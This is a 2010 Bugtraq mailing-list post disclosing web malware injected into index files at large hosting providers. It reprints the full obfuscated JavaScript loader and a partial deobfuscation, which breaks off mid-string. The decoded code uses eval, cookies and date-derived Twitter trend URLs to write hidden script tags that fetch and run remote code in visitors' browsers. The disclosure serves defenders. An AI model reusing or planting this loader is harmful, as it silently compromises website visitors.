[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20100506184919.25029.qmail@securityfocus.com>
Date: 6 May 2010 18:49:19 -0000
From: angelo@...iello.org
To: bugtraq@...urityfocus.com
Subject: New web malwares attacking big hosting providers
Dear all,
I want to share with you this phenomenon.
Web malwares are heavily attacking big hosting providers during the last days.
In particular, as I know, attacks were moved against GoDaddy (USA) and Aruba (Italy). All index files were infected. If you are a customer of the above providers, it's enough to remove the malware script, if your website was infected.
There are a couple of malwares attacking Aruba, at the moment. I just did some reverse engingeering of the last one I found.
Twitter.com is being used to support the script execution.
Cheers,
Angelo Rosiello
-------------------------
The encoded and original malware script is the following:
---------------------------------
<script language="javascript">var asdas="asd8(@+";function z(s){var asdas="asd8(@";r="";for(i=0;i<s.length;i++){var asdas="asd8(@";if(s.charAt(i)=="Z"){var asdas="asd8(@";s1="%"}else{var asdas="asd8(@";s1=s.charAt(i);}r=r+s1;var asdas="asd8(@";}return unescape(r);}var sdkajsnd="e"+""+"v"+"al";function t(){return z($a);}var $a="Z63zZ3dZ22Z2566uZ256ectZ2569oZ256e cZ257a(cZ257a)Z257bretZ2575Z2572Z256e caZ252bcb+Z2563cZ252bcdZ252bce+Z2563z;}Z253bZ22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cbZ3dZ22eZ2528Z2564Z2573);Z2573tZ253dtZ256dpZ253dZ2527Z2527;for(iZ253d0;iZ253cd
s.Z256cZ22;opZ3dZ22Z2524aZ253dZ2522dw(dcZ2573(cZ2575,1Z2534))Z253bZ2522;Z22;caZ3dZ22Z2566uZ256eZ2563tioZ256e dZ2563sZ2528dsZ252cesZ2529Z257bdsZ253dunZ2565scZ2561pZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ22enZ2567tZ2568;i+Z252bZ2529Z257btmZ2570Z253dds.sZ256cZ2569ce(Z2569,Z2569+1Z2529Z22;dzZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcaZ253dZ2527Z252564ocZ252575Z2525Z2536dZ2565Z256eZ252574Z2525Z2532ewrZ25256Z2539Z2574e(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253csZ252563ripZ25257Z2534 Z25256canZ25256Z2537Z25257Z2535aZ252567eZ25253dZ25255cZ252522jZ2561vasZ2563rZ252569pZ252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252Z2566sZ2563Z2572iptZ25253eZ2527;winZ2564owZ255bZ2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](unescapeZ2528tZ2529)};Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z
3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ceZ3dZ22pZ252echZ2561rZ2543odeZ2541t(0Z2529^(Z25270x00Z2527+Z2565s)Z2529);}Z257dZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ddZ3dZ2208y~tuh0:0tqi99
0;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cdZ3dZ22;Z2573tZ253dstZ252bSZ2574rinZ2567Z252eZ2566romZ2543haZ2572Z2543odZ2565((Z2574mZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dstZ253bZ
2564cZ2573(Z2564Z2561Z252bdZ2562+Z2564Z2563Z252bZ2564dZ252bdZ2565,Z25310Z2529Z253bZ2564Z2577Z2528Z2573tZ2529Z253bZ2573Z2574Z253dZ2524aZ253bZ2522;Z22;Z69f (Z64ocuZ6denZ74Z2ecZ6fokZ69Z65.inZ64Z65xOfZ28Z27rfZ35f6Z64sZ27)Z3dZ3d-1)Z7bfuZ6ecZ74ionZ20calZ6cbZ61Z63k(Z78Z29Z7bwindoZ77.tZ77 Z3d Z78Z3bvaZ72 d Z3d neZ77 DaZ74eZ28);Z64.Z73etTZ69meZ28x[Z22asZ5foZ66Z22]*10Z300Z29;vZ61r Z68 Z3d Z64Z2egeZ74UZ54Z43HZ6fZ75rZ73()Z3bZ77Z69Z6edZ6fw.hZ20Z3d h;iZ66 Z28h Z3e 8)Z7bd.seZ74UTCZ44aZ74e(dZ2egZ65tUZ54CDZ61te(Z29 - Z32);Z7deZ6cseZ7bZ64Z2eseZ74Z55Z54Z43Z44atZ65(d.Z67Z65Z74UZ54CDZ61tZ65()Z20Z2d 3)Z3b}Z77Z69ndZ6fwZ2eZ67d Z3d d;Z76Z61Z72Z20tiZ6dZ65 Z3d neZ77Z20ArZ72ay(Z29;vaZ72 sZ68iftZ49nZ64eZ78 Z3d Z22Z22;tiZ6deZ5bZ22yeZ61rZ22] Z3d d.gZ65tZ55Z54CZ46ulZ6cYeaZ72(Z29Z3btiZ6de[Z22monZ74hZ22Z5d Z3d Z64.gZ65tUTZ43Z4dZ6fZ6ethZ28)Z2bZ31;Z74imeZ5bZ22dayZ22]Z20Z3d d.geZ74UTZ43DZ61teZ28Z29;ifZ20(dZ2egeZ74UZ54CMZ6fnthZ28Z29+1Z20Z3c 10)Z7bsZ68Z69ftZ49Z6edZ65x Z3dZ20tiZ6deZ5bZ22yearZ22Z5d Z2b Z22-0Z22 + Z
28d.gZ65tUTZ43Z4dZ6fZ6etZ68(Z29+1Z29;Z7deZ6csZ65Z7bshiftZ49nZ64exZ20Z3d tZ69mZ65Z5bZ22yeZ61rZ22]Z20+ Z22-Z22 + (Z64Z2egeZ74UTCZ4dontZ68()Z2b1)Z3b}iZ66 (dZ2eZ67Z65Z74Z55TCDZ61teZ28)Z20Z3c 10Z29Z7bshiZ66Z74Z49ndZ65x Z3dsZ68Z69fZ74IZ6edZ65x Z2b Z22-Z30Z22 + dZ2egetZ55TZ43DZ61tZ65();Z7deZ6csZ65Z7bshZ69Z66tIZ6eZ64ex Z3d sZ68Z69fZ74InZ64ex Z2bZ20Z22-Z22 + d.Z67etUZ54Z43DaZ74Z65(Z29;}Z64oZ63Z75Z6denZ74.Z77ritZ65(Z22Z3cscrZ22Z2bZ22ipZ74 laZ6eZ67uZ61Z67Z65Z3djaZ76Z61scZ72ipZ74Z22+Z22 srcZ3dZ27htZ74Z70:Z2fZ2fsearZ63hZ2etwiZ74teZ72Z2ecZ6fZ6dZ2ftrendZ73Z2fdailZ79.Z6asoZ6e?dZ61teZ3dZ22+ sZ68ifZ74InZ64ex+Z22Z26caZ6clZ62acZ6bZ3dcZ61llbZ61ckZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fZ75nZ63tiZ6fZ6e cZ61llZ62acZ6b2(Z78)Z7bwindoZ77.twZ20Z3d xZ3bsc(Z27rZ665fZ36dsZ27,2,Z37)Z3bevZ61Z6c(uZ6eescZ61pe(Z64Z7aZ2bZ63z+Z6fpZ2bst)Z2bZ27dw(Z64Z7a+Z63z($Z61+Z73tZ29Z29Z3bZ27);Z64ocuZ6dZ65nZ74.Z77riZ74e($Z61)Z3b}dZ6fcZ75mZ65nt.Z77rZ69teZ28Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearZ63hZ2etwZ69tteZ72.cZ6fmZ2
fimaZ67esZ2fseZ61rZ63hZ2frssZ2epZ6egZ27 wZ69Z64Z74hZ3d1Z20heZ69gZ68tZ3d1 styZ6ceZ3dZ27visZ69bZ69lZ69tyZ3ahZ69Z64denZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61gZ65Z3djavZ61sZ63riZ70tZ22Z2bZ22 srZ63Z3dZ27http:Z2fZ2fsearZ63h.Z74wZ69Z74terZ2ecZ6fmZ2ftZ72Z65ndZ73Z2fdaZ69lZ79Z2eZ6asonZ3fcalZ6cbacZ6bZ3dcZ61llbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}Z65Z6cZ73eZ7b$Z61Z3dZ27Z27};fZ75Z6ecZ74ionZ20sc(Z63nZ6d,vZ2cZ65Z64Z29Z7bvaZ72 exZ64Z3dnew Z44aZ74Z65(Z29;eZ78d.Z73Z65tDZ61Z74Z65Z28exZ64.Z67etDZ61Z74eZ28)+Z65d)Z3bZ64ocuZ6deZ6et.cZ6fokiZ65Z3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27;exZ70ireZ73Z3dZ27+exd.tZ6fZ47MTSZ74Z72ingZ28Z29;};";window[sdkajsnd](t());</script>
--------------------------------------------------
Follows my quick and dirty analysis:
-------------------------------------
//execute function t - window[eval](t())
window[sdkajsnd](t());
//execute function z with a malware string as input
function t(){return z($a);
var $a="Z63zZ3dZ22Z2566uZ256ectZ2569oZ256e cZ257a(cZ257a)Z257bretZ2575Z2572Z256e caZ252bcb+Z2563cZ252bcdZ252bce+Z2563z;}Z253bZ22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cbZ3dZ22eZ2528Z2564Z2573);Z2573tZ253dtZ256dpZ253dZ2527Z2527;for(iZ253d0;iZ253cds.Z256cZ22;opZ3dZ22Z2524aZ253dZ2522dw(dcZ2573(cZ2575,1Z2534))Z253bZ2522;Z22;caZ3dZ22Z2566uZ256eZ2563tioZ256e dZ2563sZ2528dsZ252cesZ2529Z257bdsZ253dunZ2565scZ2561pZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ22enZ2567tZ2568;i+
Z252bZ2529Z257btmZ2570Z253dds.sZ256cZ2569ce(Z2569,Z2569+1Z2529Z22;dzZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcaZ253dZ2527Z252564ocZ252575Z2525Z2536dZ2565Z256eZ252574Z2525Z2532ewrZ25256Z2539Z2574e(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253csZ252563ripZ25257Z2534 Z25256canZ25256Z2537Z25257Z2535aZ252567eZ25253dZ25255cZ252522jZ2561vasZ2563rZ252569pZ252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252Z2566sZ2563Z2572iptZ25253eZ2527;winZ2564owZ255bZ2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](unescapeZ2528tZ2529)};Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sd
yZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ceZ3dZ22pZ252echZ2561rZ2543odeZ2541t(0Z2529^(Z25270x00Z2527+Z2565s)Z2529);}Z257dZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z25
2290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cdZ3dZ22;Z2573tZ253dstZ252bSZ2574rinZ2567Z252eZ2566romZ2543haZ2572Z2543odZ2565((Z2574mZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dstZ253bZ2564cZ2573(Z2564Z2561Z252bdZ2562+Z2564Z2563Z252bZ2564dZ252bdZ2565,Z25310Z2529Z253bZ2564Z2577Z2528Z2573tZ2529Z253bZ2573Z2574Z253dZ2524aZ253bZ2522;Z22;Z69f (Z64ocuZ6denZ74Z2ecZ6fokZ69Z65.inZ64Z65xOfZ28Z27rfZ35f6Z64sZ27)Z3dZ3d-1)Z7bfuZ6ecZ74ionZ20calZ6cbZ61Z63k(Z78Z29Z7bwindoZ77.tZ77 Z3d Z78Z3bvaZ72 d Z3d neZ77 DaZ74eZ28);
Z64.Z73etTZ69meZ28x[Z22asZ5foZ66Z22]*10Z300Z29;vZ61r Z68 Z3d Z64Z2egeZ74UZ54Z43HZ6fZ75rZ73()Z3bZ77Z69Z6edZ6fw.hZ20Z3d h;iZ66 Z28h Z3e 8)Z7bd.seZ74UTCZ44aZ74e(dZ2egZ65tUZ54CDZ61te(Z29 - Z32);Z7deZ6cseZ7bZ64Z2eseZ74Z55Z54Z43Z44atZ65(d.Z67Z65Z74UZ54CDZ61tZ65()Z20Z2d 3)Z3b}Z77Z69ndZ6fwZ2eZ67d Z3d d;Z76Z61Z72Z20tiZ6dZ65 Z3d neZ77Z20ArZ72ay(Z29;vaZ72 sZ68iftZ49nZ64eZ78 Z3d Z22Z22;tiZ6deZ5bZ22yeZ61rZ22] Z3d d.gZ65tZ55Z54CZ46ulZ6cYeaZ72(Z29Z3btiZ6de[Z22monZ74hZ22Z5d Z3d Z64.gZ65tUTZ43Z4dZ6fZ6ethZ28)Z2bZ31;Z74imeZ5bZ22dayZ22]Z20Z3d d.geZ74UTZ43DZ61teZ28Z29;ifZ20(dZ2egeZ74UZ54CMZ6fnthZ28Z29+1Z20Z3c 10)Z7bsZ68Z69ftZ49Z6edZ65x Z3dZ20tiZ6deZ5bZ22yearZ22Z5d Z2b Z22-0Z22 + Z28d.gZ65tUTZ43Z4dZ6fZ6etZ68(Z29+1Z29;Z7deZ6csZ65Z7bshiftZ49nZ64exZ20Z3d tZ69mZ65Z5bZ22yeZ61rZ22]Z20+ Z22-Z22 + (Z64Z2egeZ74UTCZ4dontZ68()Z2b1)Z3b}iZ66 (dZ2eZ67Z65Z74Z55TCDZ61teZ28)Z20Z3c 10Z29Z7bshiZ66Z74Z49ndZ65x Z3dsZ68Z69fZ74IZ6edZ65x Z2b Z22-Z30Z22 + dZ2egetZ55TZ43DZ61tZ65();Z7deZ6csZ65Z7bshZ69Z66tIZ6eZ64ex Z3d sZ68
Z69fZ74InZ64ex Z2bZ20Z22-Z22 + d.Z67etUZ54Z43DaZ74Z65(Z29;}Z64oZ63Z75Z6denZ74.Z77ritZ65(Z22Z3cscrZ22Z2bZ22ipZ74 laZ6eZ67uZ61Z67Z65Z3djaZ76Z61scZ72ipZ74Z22+Z22 srcZ3dZ27htZ74Z70:Z2fZ2fsearZ63hZ2etwiZ74teZ72Z2ecZ6fZ6dZ2ftrendZ73Z2fdailZ79.Z6asoZ6e?dZ61teZ3dZ22+ sZ68ifZ74InZ64ex+Z22Z26caZ6clZ62acZ6bZ3dcZ61llbZ61ckZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fZ75nZ63tiZ6fZ6e cZ61llZ62acZ6b2(Z78)Z7bwindoZ77.twZ20Z3d xZ3bsc(Z27rZ665fZ36dsZ27,2,Z37)Z3bevZ61Z6c(uZ6eescZ61pe(Z64Z7aZ2bZ63z+Z6fpZ2bst)Z2bZ27dw(Z64Z7a+Z63z($Z61+Z73tZ29Z29Z3bZ27);Z64ocuZ6dZ65nZ74.Z77riZ74e($Z61)Z3b}dZ6fcZ75mZ65nt.Z77rZ69teZ28Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearZ63hZ2etwZ69tteZ72.cZ6fmZ2fimaZ67esZ2fseZ61rZ63hZ2frssZ2epZ6egZ27 wZ69Z64Z74hZ3d1Z20heZ69gZ68tZ3d1 styZ6ceZ3dZ27visZ69bZ69lZ69tyZ3ahZ69Z64denZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61gZ65Z3djavZ61sZ63riZ70tZ22Z2bZ22 srZ63Z3dZ27http:Z2fZ2fsearZ63h.Z74wZ69Z74terZ2ecZ6fmZ2ftZ72Z65ndZ73Z2fdaZ69lZ79Z2eZ6asonZ3fcalZ6cbacZ6bZ3dcZ61llbZ61ckZ27Z3eZ22 + Z
22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}Z65Z6cZ73eZ7b$Z61Z3dZ27Z27};fZ75Z6ecZ74ionZ20sc(Z63nZ6d,vZ2cZ65Z64Z29Z7bvaZ72 exZ64Z3dnew Z44aZ74Z65(Z29;eZ78d.Z73Z65tDZ61Z74Z65Z28exZ64.Z67etDZ61Z74eZ28)+Z65d)Z3bZ64ocuZ6deZ6et.cZ6fokiZ65Z3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27;exZ70ireZ73Z3dZ27+exd.tZ6fZ47MTSZ74Z72ingZ28Z29;};";
//function z elaborates the input malware string 'a':
//if the input character 'i' is equal to Z returns '%' else 'i'
//the resulting string is the following 's'
s="%63z%3d%22%2566u%256ect%2569o%256e c%257a(c%257a)%257bret%2575%2572%256e ca%252bcb+%2563c%252bcd%252bce+%2563z;}%253b%22;db%3d%227FtuQd8!90;0!%25200;gy~t%257Fg%3edg%3edbu~tcKyMK$M%3eaeubi%3e|u~wdx+rbuq%7b+mmyv08cxyvdY~tuh0--0%252009kcxyvdY~tuh0-0gy~t%257Fg%3edg%3edbu~tcKyMK%2526M%3eaeubi%3esxqbS%257FtuQd8!90;0%270;gy~t%257Fg%3edg%3edbu~tcKyMK%2526M%3eaeubi%3e|u~wdx+m0yv08cxyvdY~tuh0.0%25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%257Fg%3ewt%3ewudEDSVe||Iuqb89+dy}uK7}%257F~dx7M0-0gy~t%257Fg%3ewt%3ewudEDS]%257F~dx89;!+dy}uK7tqi7M0-0gy~t%257Fg%3ewt%3ewudEDSTqdu89+fqb0t-7v%22;cb%3d%22e%2528%2564%2573);%2573t%253dt%256dp%253d%2527%2527;for(i%253d0;i%253cds.%256c%22;op%3d%22%2524a%253d%2522dw(dc%2573(c%2575,1%2534))%253b%2522;%22;ca%3d%22%2566u%256e%2563tio%256e d%2563s%2528ds%252ces%2529%257bds%253dun%2565sc%2561p%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w%7by;xp;v}zfsz%2526;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;cc%3d%22en%2567t%2568;i+%252b
%2529%257btm%2570%253dds.s%256c%2569ce(%2569,%2569+1%2529%22;dz%3d%22%2566un%2563ti%256fn %2564%2577(t%2529%257bca%253d%2527%252564oc%252575%2525%2536d%2565%256e%252574%2525%2532ewr%25256%2539%2574e(%252522%2527;ce%253d%2527%252522)%2527;cb%253d%2527%25253cs%252563rip%25257%2534 %25256can%25256%2537%25257%2535a%252567e%25253d%25255c%252522j%2561vas%2563r%252569p%252574%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252%2566s%2563%2572ipt%25253e%2527;win%2564ow%255b%2522e%2522+%2522%2522+ %2522v%2522+%2522al%2522](unescape%2528t%2529)};%22;dc%3d%22rs}vyb%3es%257F}7+fqb0}%257F~dxc0-0~ug0Qbbqi87trc7%3c07id~7%3c07f}d7%3c07f}b7%3c07}|s7%3c07%257Fh%7b7%3c07vtc7%3c07rfv7%3c07iec7%3c07}s`7%3c07~sj7%3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7z7%3c7y7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27%3c(%3c)9+%2519ve~sdy%257
F~0Sq|se|qdu]qwys^e}rub8tqi%3c0}%257F~dx%3c0iuqb%3c0y~tuh9kbudeb~0888iuqb0;%22;ce%3d%22p%252ech%2561r%2543ode%2541t(0%2529^(%25270x00%2527+%2565s)%2529);}%257d%22;da%3d%22fqb0t-7vrs}vyb%3es%257F}7+0fqb0cxyvdY~tuh0-0%2520+v%257Fb08fqb0y0y~0gy~t%257Fg%3edg%3edbu~tc9kyv08gy~t%257Fg%3ex0.0(0660gy~t%257Fg%3ex0,0%2522!0660y%3ey~tuh_v870%2520%27790.0%3d!9kcxyvdY~tuh0-0gy~t%257Fg%3edg%3edbu~tcKyMK$M%3eaeubi%3esxqbS%257FtuQd8!90;0gy~t%257Fg%3edg%3edbu~tcKyMK$M%3eaeubi%3e|u~wdx+rbuq%7b+mu|cu0yv088gy~t%257Fg%3ex0,0)0ll00gy~t%257Fg%3ex0.0%2522%252090660y%3ey~tuh_v870!(790.0%3d!9kcxyvdY~tuh0-0gy~t%257Fg%3edg%3edbu~tcKyMK$M%3eaeubi%3esxqbS%25%22;dd%3d%2208y~tuh0:0tqi990;08}%257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!%3c0iuqbSx%2522%3c0}%257F~dxSx%3c0tqiSx%3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M%3c0dy}uK7}%257F~dx7M%3c0dy}uK7iuqb7M%3c0cxyvdY~tuh9;!%2520%2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%2520hQQ90;0~e}9050%2526#9050%2522%2526M0;0|uddubcK888dy}uK7iuqb7M060%2520hQQ90,,0%252290;
